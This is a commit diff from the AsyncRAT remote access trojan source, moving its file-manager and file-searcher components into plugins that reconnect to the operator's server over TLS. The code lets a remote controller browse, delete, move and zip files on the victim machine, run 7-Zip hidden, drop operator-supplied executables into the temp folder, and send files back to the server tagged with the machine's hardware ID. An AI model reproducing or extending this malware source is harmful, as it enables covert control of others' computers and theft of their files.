<xs:element minOccurs="0" maxOccurs="1" name="Unmanaged64Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 64 bit assembly names to include, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="PreloadOrder" type="xs:string">
<xs:annotation>
<xs:documentation>The order of preloaded assemblies, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
</xs:all>
<xs:attribute name="CreateTemporaryAssemblies" type="xs:boolean">
<xs:annotation>
<xs:documentation>This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IncludeDebugSymbols" type="xs:boolean">
<xs:annotation>
<xs:documentation>Controls if .pdbs for reference assemblies are also embedded.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="DisableCompression" type="xs:boolean">
<xs:annotation>
<xs:documentation>Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="DisableCleanup" type="xs:boolean">
<xs:annotation>
<xs:documentation>As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="LoadAtModuleInit" type="xs:boolean">
<xs:annotation>
<xs:documentation>Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IgnoreSatelliteAssemblies" type="xs:boolean">
<xs:annotation>
<xs:documentation>Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="ExcludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with |</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IncludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="Unmanaged32Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 32 bit assembly names to include, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="Unmanaged64Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 64 bit assembly names to include, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="PreloadOrder" type="xs:string">
<xs:annotation>
<xs:documentation>The order of preloaded assemblies, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
</xs:complexType>
</xs:element>
</xs:all>
<xs:attribute name="VerifyAssembly" type="xs:boolean">
<xs:annotation>
<xs:documentation>'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="VerifyIgnoreCodes" type="xs:string">
<xs:annotation>
<xs:documentation>A comma-separated list of error codes that can be safely ignored in assembly verification.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="GenerateXsd" type="xs:boolean">
<xs:annotation>
<xs:documentation>'false' to turn off automatic generation of the XML Schema file.</xs:documentation>
</xs:annotation>
</xs:attribute>
</xs:complexType>
</xs:element>
</xs:schema>

182
AsyncRAT-C#/Client/Handle Packet/HandleFileManager.cs → AsyncRAT-C#/Plugin/FileManager/FileManager/Handler/FileManager.cs
View File

@ -1,20 +1,13 @@
using Client.MessagePack;
using Client.Connection;
using System;
using System.Collections.Generic;
using System;
using System.Drawing;
using System.Drawing.Imaging;
using System.IO;
using System.Linq;
using System.Text;
using System.Diagnostics;
using System.Net.Sockets;
using System.Security.Authentication;
using System.Net.Security;
using System.Security.Cryptography.X509Certificates;
using System.Threading;
using MessagePackLib.MessagePack;
namespace Client.Handle_Packet
namespace Plugin.Handler
{
public class FileManager
{
@ -84,7 +77,7 @@ namespace Client.Handle_Packet
case "deleteFolder":
{
string fullPath = unpack_msgpack.ForcePathObject("Folder").AsString;
if (Directory.Exists(fullPath)) Directory.Delete(fullPath);
if (Directory.Exists(fullPath)) Directory.Delete(fullPath, true);
break;
}
@ -106,7 +99,10 @@ namespace Client.Handle_Packet
{
if (filesArray[i].Length > 0)
{
File.Copy(filesArray[i], Path.Combine(fullPath, Path.GetFileName(filesArray[i])), true);
if (unpack_msgpack.ForcePathObject("IO").AsString == "copy")
File.Copy(filesArray[i], Path.Combine(fullPath, Path.GetFileName(filesArray[i])), true);
else
File.Move(filesArray[i], Path.Combine(fullPath, Path.GetFileName(filesArray[i])));
}
}
catch (Exception ex)
@ -130,6 +126,47 @@ namespace Client.Handle_Packet
Directory.Move(unpack_msgpack.ForcePathObject("Folder").AsString, unpack_msgpack.ForcePathObject("NewName").AsString);
break; ;
}
case "zip":
{
if (Packet.ZipPath == null)
{
CheckForSevenZip();
}
if (Packet.ZipPath == null)
{
Error("not installed!");
return;
}
if (unpack_msgpack.ForcePathObject("Zip").AsString == "true")
{
StringBuilder sb = new StringBuilder();
StringBuilder location = new StringBuilder();
foreach (string path in unpack_msgpack.ForcePathObject("Path").AsString.Split(new[] { "-=>" }, StringSplitOptions.None))
{
if (!string.IsNullOrWhiteSpace(path))
{
sb.Append($"-ir!\"{path}\" ");
if (location.Length == 0)
location.Append(Path.GetFullPath(path));
}
}
Debug.WriteLine(sb.ToString());
Debug.WriteLine(location.ToString());
ZipCommandLine(sb.ToString(), true, location.ToString());
}
else
{
ZipCommandLine(unpack_msgpack.ForcePathObject("Path").AsString, false, "");
}
break;
}
case "installZip":
{
InstallSevenZip(unpack_msgpack);
break;
}
}
}
@ -140,6 +177,83 @@ namespace Client.Handle_Packet
}
}
private void ZipCommandLine(string args, bool isZip, string location)
{
if (isZip)
{
Process.Start(new ProcessStartInfo
{
FileName = "\"" + Packet.ZipPath + "\"",
Arguments = $"a -r \"{location}.zip\" {args} -y",
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
UseShellExecute = false,
ErrorDialog = false,
});
}
else
{
Process.Start(new ProcessStartInfo
{
FileName = "\"" + Packet.ZipPath + "\"",
Arguments = $"x \"{args}\" -o\"{args.Replace(Path.GetFileName(args), "_" + Path.GetFileNameWithoutExtension(args))}\" -y",
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
UseShellExecute = false,
ErrorDialog = false,
});
}
}
private void CheckForSevenZip()
{
try
{
string sevenZip64 = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles), "7-Zip", "7z.exe");
string sevenZip32 = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFilesX86), "7-Zip", "7z.exe");
string asyncratSvenzip = Path.Combine(Path.GetTempPath(), "7-Zip", "7z.exe");
if (File.Exists(sevenZip64))
Packet.ZipPath = sevenZip64;
else if (File.Exists(sevenZip32))
Packet.ZipPath = sevenZip32;
else if (File.Exists(asyncratSvenzip))
Packet.ZipPath = asyncratSvenzip;
else
Packet.ZipPath = null;
}
catch (Exception ex)
{
Error(ex.Message);
}
}
private void InstallSevenZip(MsgPack unpack_msgpack)
{
try
{
string asyncratSvenzip = Path.Combine(Path.GetTempPath(), "7-Zip");
if (!Directory.Exists(asyncratSvenzip))
{
Directory.CreateDirectory(asyncratSvenzip);
}
using (FileStream fs = new FileStream(Path.Combine(asyncratSvenzip, "7z.exe"), FileMode.Create))
fs.Write(unpack_msgpack.ForcePathObject("exe").GetAsBytes(), 0, unpack_msgpack.ForcePathObject("exe").GetAsBytes().Length);
using (FileStream fs = new FileStream(Path.Combine(asyncratSvenzip, "7z.dll"), FileMode.Create))
fs.Write(unpack_msgpack.ForcePathObject("dll").GetAsBytes(), 0, unpack_msgpack.ForcePathObject("dll").GetAsBytes().Length);
Error("installation is done!");
}
catch (Exception ex)
{
Error(ex.Message);
}
}
public void GetDrivers()
{
try
@ -147,6 +261,7 @@ namespace Client.Handle_Packet
DriveInfo[] allDrives = DriveInfo.GetDrives();
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "fileManager";
msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack.ForcePathObject("Command").AsString = "getDrivers";
StringBuilder sbDriver = new StringBuilder();
foreach (DriveInfo d in allDrives)
@ -156,7 +271,7 @@ namespace Client.Handle_Packet
sbDriver.Append(d.Name + "-=>" + d.DriveType + "-=>");
}
msgpack.ForcePathObject("Driver").AsString = sbDriver.ToString();
ClientSocket.Send(msgpack.Encode2Bytes());
Connection.Send(msgpack.Encode2Bytes());
}
}
catch { }
@ -169,6 +284,7 @@ namespace Client.Handle_Packet
Debug.WriteLine($"Getting [{path}]");
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "fileManager";
msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack.ForcePathObject("Command").AsString = "getPath";
StringBuilder sbFolder = new StringBuilder();
StringBuilder sbFile = new StringBuilder();
@ -192,7 +308,7 @@ namespace Client.Handle_Packet
msgpack.ForcePathObject("Folder").AsString = sbFolder.ToString();
msgpack.ForcePathObject("File").AsString = sbFile.ToString();
msgpack.ForcePathObject("CurrentPath").AsString = path.ToString();
ClientSocket.Send(msgpack.Encode2Bytes());
Connection.Send(msgpack.Encode2Bytes());
}
catch (Exception ex)
{
@ -232,6 +348,7 @@ namespace Client.Handle_Packet
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "socketDownload";
msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack.ForcePathObject("Command").AsString = "pre";
msgpack.ForcePathObject("DWID").AsString = dwid;
msgpack.ForcePathObject("File").AsString = file;
@ -241,12 +358,12 @@ namespace Client.Handle_Packet
MsgPack msgpack2 = new MsgPack();
msgpack2.ForcePathObject("Packet").AsString = "socketDownload";
msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack2.ForcePathObject("Command").AsString = "save";
msgpack2.ForcePathObject("DWID").AsString = dwid;
msgpack2.ForcePathObject("Name").AsString = Path.GetFileName(file);
msgpack2.ForcePathObject("File").LoadFileAsBytes(file);
tempSocket.Send(msgpack2.Encode2Bytes());
tempSocket.Dispose();
}
catch
{
@ -255,35 +372,6 @@ namespace Client.Handle_Packet
}
}
//private void ChunkSend(byte[] msg, Socket client, SslStream ssl)
//{
// try
// {
// byte[] buffersize = BitConverter.GetBytes(msg.Length);
// client.Poll(-1, SelectMode.SelectWrite);
// ssl.Write(buffersize);
// ssl.Flush();
// int chunkSize = 50 * 1024;
// byte[] chunk = new byte[chunkSize];
// using (MemoryStream buffereReader = new MemoryStream(msg))
// {
// BinaryReader binaryReader = new BinaryReader(buffereReader);
// int bytesToRead = (int)buffereReader.Length;
// do
// {
// chunk = binaryReader.ReadBytes(chunkSize);
// bytesToRead -= chunkSize;
// ssl.Write(chunk);
// ssl.Flush();
// } while (bytesToRead > 0);
// binaryReader.Dispose();
// }
// }
// catch { return; }
//}
public void ReqUpload(string id)
{
try
@ -291,6 +379,7 @@ namespace Client.Handle_Packet
TempSocket tempSocket = new TempSocket();
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "fileManager";
msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack.ForcePathObject("Command").AsString = "reqUploadFile";
msgpack.ForcePathObject("ID").AsString = id;
tempSocket.Send(msgpack.Encode2Bytes());
@ -302,9 +391,12 @@ namespace Client.Handle_Packet
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "fileManager";
msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack.ForcePathObject("Command").AsString = "error";
msgpack.ForcePathObject("Message").AsString = ex;
ClientSocket.Send(msgpack.Encode2Bytes());
Connection.Send(msgpack.Encode2Bytes());
}
}
}

67
AsyncRAT-C#/Plugin/FileManager/FileManager/ILMerge.props Normal file
View File

@ -0,0 +1,67 @@
<?xml version="1.0" encoding="utf-8" ?>
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<!-- -->
<!-- ILMerge project-specific settings. Almost never need to be set explicitly. -->
<!-- for details, see http://research.microsoft.com/en-us/people/mbarnett/ilmerge.aspx -->
<!-- -->
<!-- *** set this file to Type=None, CopyToOutput=Never *** -->
<!-- If True, all copy local dependencies will also be merged from referenced projects whether they are referenced in the current project explicitly or not -->
<ILMergeTransitive>true</ILMergeTransitive>
<!-- Extra ILMerge library paths (semicolon-separated). Dont put your package dependencies here, they will be added automagically -->
<ILMergeLibraryPath></ILMergeLibraryPath>
<!-- The solution NuGet package directory if not standard 'SOLUTION\packages' -->
<ILMergePackagesPath></ILMergePackagesPath>
<!-- The merge order file name if differs from standard 'ILMergeOrder.txt' -->
<ILMergeOrderFile></ILMergeOrderFile>
<!-- The strong key file name if not specified in the project -->
<ILMergeKeyFile></ILMergeKeyFile>
<!-- The assembly version if differs for the version of the main assembly -->
<ILMergeAssemblyVersion></ILMergeAssemblyVersion>
<!-- added in Version 1.0.4 -->
<ILMergeFileAlignment></ILMergeFileAlignment>
<!-- added in Version 1.0.4, default=none -->
<ILMergeAllowDuplicateType></ILMergeAllowDuplicateType>
<!-- If the <see cref="CopyAttributes"/> is also set, any assembly-level attributes names that have the same type are copied over into the target assembly -->
<ILMergeAllowMultipleAssemblyLevelAttributes></ILMergeAllowMultipleAssemblyLevelAttributes>
<!-- See ILMerge documentation -->
<ILMergeAllowZeroPeKind></ILMergeAllowZeroPeKind>
<!-- The assembly level attributes of each input assembly are copied over into the target assembly -->
<ILMergeCopyAttributes></ILMergeCopyAttributes>
<!-- Creates a .pdb file for the output assembly and merges into it any .pdb files found for input assemblies, default=true -->
<ILMergeDebugInfo>false</ILMergeDebugInfo>
<!-- Target assembly will be delay signed -->
<ILMergeDelaySign></ILMergeDelaySign>
<!-- Types in assemblies other than the primary assembly have their visibility modified -->
<ILMergeInternalize></ILMergeInternalize>
<!-- The path name of the file that will be used to identify types that are not to have their visibility modified -->
<ILMergeInternalizeExcludeFile></ILMergeInternalizeExcludeFile>
<!-- XML documentation files are merged to produce an XML documentation file for the target assembly -->
<ILMergeXmlDocumentation></ILMergeXmlDocumentation>
<!-- External assembly references in the manifest of the target assembly will use full public keys (false) or public key tokens (true, default value) -->
<ILMergePublicKeyTokens></ILMergePublicKeyTokens>
<!-- Types with the same name are all merged into a single type in the target assembly -->
<ILMergeUnionMerge></ILMergeUnionMerge>
<!-- The version of the target framework, default 40 (works for 45 too) -->
<ILTargetPlatform></ILTargetPlatform>
</PropertyGroup>
</Project>

4
AsyncRAT-C#/Plugin/FileManager/FileManager/ILMergeOrder.txt Normal file
View File

@ -0,0 +1,4 @@
# this file contains the partial list of the merged assemblies in the merge order
# you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
# and finetune merge order to your satisfaction

50
AsyncRAT-C#/Plugin/FileManager/FileManager/Packet.cs Normal file
View File

@ -0,0 +1,50 @@
using Plugin.Handler;
using MessagePackLib.MessagePack;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Management;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
namespace Plugin
{
public static class Packet
{
public static string FileCopy = null;
public static string ZipPath = null;
public static void Read(object data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "fileManager":
{
new FileManager(unpack_msgpack);
}
break;
}
}
catch (Exception ex)
{
Error(ex.Message);
}
}
public static void Error(string ex)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Error";
msgpack.ForcePathObject("Error").AsString = ex;
Connection.Send(msgpack.Encode2Bytes());
}
}
}

44
AsyncRAT-C#/Plugin/FileManager/FileManager/Plugin.cs Normal file
View File

@ -0,0 +1,44 @@
using MessagePackLib.MessagePack;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Net.Security;
using System.Net.Sockets;
using System.Security.Cryptography.X509Certificates;
using System.Text;
using System.Threading;
namespace Plugin
{
public class Plugin
{
public static Socket Socket;
public static Mutex AppMutex;
public static string Mutex;
public static string BDOS;
public static string Install;
public static string InstallFile;
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
{
Debug.WriteLine("Plugin Invoked");
AppMutex = mutex;
Mutex = mtx;
BDOS = bdos;
Install = install;
Socket = socket;
Connection.ServerCertificate = certificate;
Connection.Hwid = hwid;
new Thread(() =>
{
Connection.InitializeClient(msgPack);
}).Start();
while (Connection.IsConnected)
{
Thread.Sleep(1000);
}
}
}
}

36
AsyncRAT-C#/Plugin/FileManager/FileManager/Properties/AssemblyInfo.cs Normal file
View File

@ -0,0 +1,36 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
//[assembly: AssemblyTitle("FileManager")]
//[assembly: AssemblyDescription("")]
//[assembly: AssemblyConfiguration("")]
//[assembly: AssemblyCompany("")]
//[assembly: AssemblyProduct("FileManager")]
//[assembly: AssemblyCopyright("Copyright © 2019")]
//[assembly: AssemblyTrademark("")]
//[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
//[assembly: Guid("bee88186-769a-452c-9dd9-d0e0815d92bf")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]

114
AsyncRAT-C#/Client/Connection/TempSocket.cs → AsyncRAT-C#/Plugin/FileManager/FileManager/TempSocket.cs
View File

@ -1,8 +1,4 @@
using Client.Handle_Packet;
using Client.Helper;
using Client.MessagePack;
using Microsoft.VisualBasic.Devices;
using System;
using System;
using System.Diagnostics;
using System.IO;
using System.Net.Sockets;
@ -13,7 +9,7 @@ using System.Net.Security;
using System.Security.Authentication;
using System.Security.Cryptography.X509Certificates;
using System.Net;
using Client.Algorithm;
using MessagePackLib.MessagePack;
// │ Author : NYAN CAT
// │ Name : Nyan Socket v0.1
@ -21,15 +17,15 @@ using Client.Algorithm;
// This program is distributed for educational purposes only.
namespace Client.Connection
namespace Plugin
{
public class TempSocket
{
public Socket TcpClient { get; set; }
public SslStream SslClient { get; set; }
private byte[] Buffer { get; set; }
private long Buffersize { get; set; }
private MemoryStream MS { get; set; }
private static long HeaderSize { get; set; }
private static long Offset { get; set; }
public bool IsConnected { get; set; }
private object SendSync { get; } = new object();
private static Timer Tick { get; set; }
@ -37,7 +33,7 @@ namespace Client.Connection
public TempSocket()
{
if (!ClientSocket.IsConnected) return;
if (!Connection.IsConnected) return;
try
{
@ -47,14 +43,15 @@ namespace Client.Connection
SendBufferSize = 50 * 1024,
};
TcpClient.Connect(ClientSocket.TcpClient.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(ClientSocket.TcpClient.RemoteEndPoint.ToString().Split(':')[1]));
TcpClient.Connect(Connection.TcpClient.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(Connection.TcpClient.RemoteEndPoint.ToString().Split(':')[1]));
Debug.WriteLine("Temp Connected!");
IsConnected = true;
SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate);
SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
Buffer = new byte[4];
MS = new MemoryStream();
HeaderSize = 4;
Buffer = new byte[HeaderSize];
Offset = 0;
Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000));
SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
}
@ -71,7 +68,7 @@ namespace Client.Connection
#if DEBUG
return true;
#endif
return Settings.ServerCertificate.Equals(certificate);
return Connection.ServerCertificate.Equals(certificate);
}
public void Dispose()
@ -89,69 +86,77 @@ namespace Client.Connection
Tick?.Dispose();
SslClient?.Dispose();
TcpClient?.Dispose();
MS?.Dispose();
}
catch { }
}
public void ReadServertData(IAsyncResult ar)
public void ReadServertData(IAsyncResult ar) //Socket read/recevie
{
try
{
if (!ClientSocket.IsConnected || !IsConnected)
if (!TcpClient.Connected || !IsConnected)
{
IsConnected = false;
Dispose();
return;
}
int recevied = SslClient.EndRead(ar);
if (recevied > 0)
{
MS.Write(Buffer, 0, recevied);
if (MS.Length == 4)
Offset += recevied;
HeaderSize -= recevied;
if (HeaderSize == 0)
{
Buffersize = BitConverter.ToInt32(MS.ToArray(), 0);
Debug.WriteLine("/// Client Buffersize " + Buffersize.ToString() + " Bytes ///");
MS.Dispose();
MS = new MemoryStream();
if (Buffersize > 0)
HeaderSize = BitConverter.ToInt32(Buffer, 0);
Debug.WriteLine("/// Plugin Buffersize " + HeaderSize.ToString() + " Bytes ///");
if (HeaderSize > 0)
{
Buffer = new byte[Buffersize];
while (MS.Length != Buffersize)
Offset = 0;
Buffer = new byte[HeaderSize];
while (HeaderSize > 0)
{
int rc = SslClient.Read(Buffer, 0, Buffer.Length);
if (rc == 0)
int rc = SslClient.Read(Buffer, (int)Offset, (int)HeaderSize);
if (rc <= 0)
{
IsConnected = false;
return;
}
Offset += rc;
HeaderSize -= rc;
if (HeaderSize < 0)
{
IsConnected = false;
Dispose();
return;
}
MS.Write(Buffer, 0, rc);
Buffer = new byte[Buffersize - MS.Length];
}
if (MS.Length == Buffersize)
{
Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
thread.Start(MS.ToArray());
Buffer = new byte[4];
MS.Dispose();
MS = new MemoryStream();
}
Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
thread.Start(Buffer);
Offset = 0;
HeaderSize = 4;
Buffer = new byte[HeaderSize];
}
else
{
HeaderSize = 4;
Buffer = new byte[HeaderSize];
Offset = 0;
}
}
SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
else if (HeaderSize < 0)
{
IsConnected = false;
return;
}
SslClient.BeginRead(Buffer, (int)Offset, (int)HeaderSize, ReadServertData, null);
}
else
{
IsConnected = false;
Dispose();
return;
}
}
catch
{
IsConnected = false;
Dispose();
return;
}
}
@ -162,7 +167,7 @@ namespace Client.Connection
{
try
{
if (!IsConnected || !ClientSocket.IsConnected)
if (!IsConnected || !Connection.IsConnected)
{
Dispose();
return;
@ -174,21 +179,16 @@ namespace Client.Connection
if (msg.Length > 1000000) //1mb
{
Debug.WriteLine("send chunks");
int chunkSize = 50 * 1024;
byte[] chunk = new byte[chunkSize];
using (MemoryStream buffereReader = new MemoryStream(msg))
using (MemoryStream memoryStream = new MemoryStream(msg))
{
BinaryReader binaryReader = new BinaryReader(buffereReader);
int bytesToRead = (int)buffereReader.Length;
do
int read = 0;
memoryStream.Position = 0;
byte[] chunk = new byte[50 * 1000];
while ((read = memoryStream.Read(chunk, 0, chunk.Length)) > 0)
{
chunk = binaryReader.ReadBytes(chunkSize);
bytesToRead -= chunkSize;
SslClient.Write(chunk, 0, chunk.Length);
SslClient.Flush();
} while (bytesToRead > 0);
binaryReader.Dispose();
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(chunk, 0, read);
}
}
}
else

5
AsyncRAT-C#/Plugin/FileManager/FileManager/packages.config Normal file
View File

@ -0,0 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<packages>
<package id="ILMerge" version="3.0.29" targetFramework="net40" />
<package id="MSBuild.ILMerge.Task" version="1.1.3" targetFramework="net40" />
</packages>

25
AsyncRAT-C#/Plugin/FileSearcher/FileSearcher.sln Normal file
View File

@ -0,0 +1,25 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30002.166
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "FileSearcher", "FileSearcher\FileSearcher.csproj", "{9D1D39D8-2387-46ED-A4A8-59D250C97F35}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{9D1D39D8-2387-46ED-A4A8-59D250C97F35}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{9D1D39D8-2387-46ED-A4A8-59D250C97F35}.Debug|Any CPU.Build.0 = Debug|Any CPU
{9D1D39D8-2387-46ED-A4A8-59D250C97F35}.Release|Any CPU.ActiveCfg = Release|Any CPU
{9D1D39D8-2387-46ED-A4A8-59D250C97F35}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {3B852AFB-3605-49E9-9364-8EDEF4D95072}
EndGlobalSection
EndGlobal

229
AsyncRAT-C#/Plugin/FileSearcher/FileSearcher/Connection.cs Normal file
View File

@ -0,0 +1,229 @@
using MessagePackLib.MessagePack;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Net.Security;
using System.Net.Sockets;
using System.Security.Authentication;
using System.Security.Cryptography.X509Certificates;
using System.Text;
using System.Threading;
namespace Plugin
{
public static class Connection
{
public static Socket TcpClient { get; set; }
public static SslStream SslClient { get; set; }
public static X509Certificate2 ServerCertificate { get; set; }
private static byte[] Buffer { get; set; }
private static long HeaderSize { get; set; }
private static long Offset { get; set; }
private static Timer Tick { get; set; }
public static bool IsConnected { get; set; }
private static object SendSync { get; } = new object();
public static string Hwid { get; set; }
public static void InitializeClient(byte[] packet)
{
try
{
TcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
{
ReceiveBufferSize = 50 * 1024,
SendBufferSize = 50 * 1024,
};
TcpClient.Connect(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[1]));
if (TcpClient.Connected)
{
Debug.WriteLine("Plugin Connected!");
IsConnected = true;
SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate);
SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
HeaderSize = 4;
Buffer = new byte[HeaderSize];
Offset = 0;
Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000));
SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
new Thread(() =>
{
Packet.Read(packet);
}).Start();
}
else
{
IsConnected = false;
return;
}
}
catch
{
Debug.WriteLine("Disconnected!");
IsConnected = false;
return;
}
}
private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
{
#if DEBUG
return true;
#endif
return ServerCertificate.Equals(certificate);
}
public static void Disconnected()
{
try
{
try
{
if (File.Exists(Packet.ZipfilePath))
{
File.Delete(Packet.ZipfilePath);
}
}
catch { }
IsConnected = false;
Tick?.Dispose();
SslClient?.Dispose();
TcpClient?.Dispose();
GC.Collect();
}
catch { }
}
public static void ReadServertData(IAsyncResult ar) //Socket read/recevie
{
try
{
if (!TcpClient.Connected || !IsConnected)
{
Disconnected();
return;
}
int recevied = SslClient.EndRead(ar);
if (recevied > 0)
{
Offset += recevied;
HeaderSize -= recevied;
if (HeaderSize == 0)
{
HeaderSize = BitConverter.ToInt32(Buffer, 0);
Debug.WriteLine("/// Plugin Buffersize " + HeaderSize.ToString() + " Bytes ///");
if (HeaderSize > 0)
{
Offset = 0;
Buffer = new byte[HeaderSize];
while (HeaderSize > 0)
{
int rc = SslClient.Read(Buffer, (int)Offset, (int)HeaderSize);
if (rc <= 0)
{
Disconnected();
return;
}
Offset += rc;
HeaderSize -= rc;
if (HeaderSize < 0)
{
Disconnected();
return;
}
}
Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
thread.Start(Buffer);
Offset = 0;
HeaderSize = 4;
Buffer = new byte[HeaderSize];
}
else
{
HeaderSize = 4;
Buffer = new byte[HeaderSize];
Offset = 0;
}
}
else if (HeaderSize < 0)
{
Disconnected();
return;
}
SslClient.BeginRead(Buffer, (int)Offset, (int)HeaderSize, ReadServertData, null);
}
else
{
Disconnected();
return;
}
}
catch
{
Disconnected();
return;
}
}
public static void Send(byte[] msg)
{
lock (SendSync)
{
try
{
if (!IsConnected || msg == null)
{
return;
}
byte[] buffersize = BitConverter.GetBytes(msg.Length);
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(buffersize, 0, buffersize.Length);
if (msg.Length > 1000000) //1mb
{
using (MemoryStream memoryStream = new MemoryStream(msg))
{
int read = 0;
memoryStream.Position = 0;
byte[] chunk = new byte[50 * 1000];
while ((read = memoryStream.Read(chunk, 0, chunk.Length)) > 0)
{
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(chunk, 0, read);
SslClient.Flush();
}
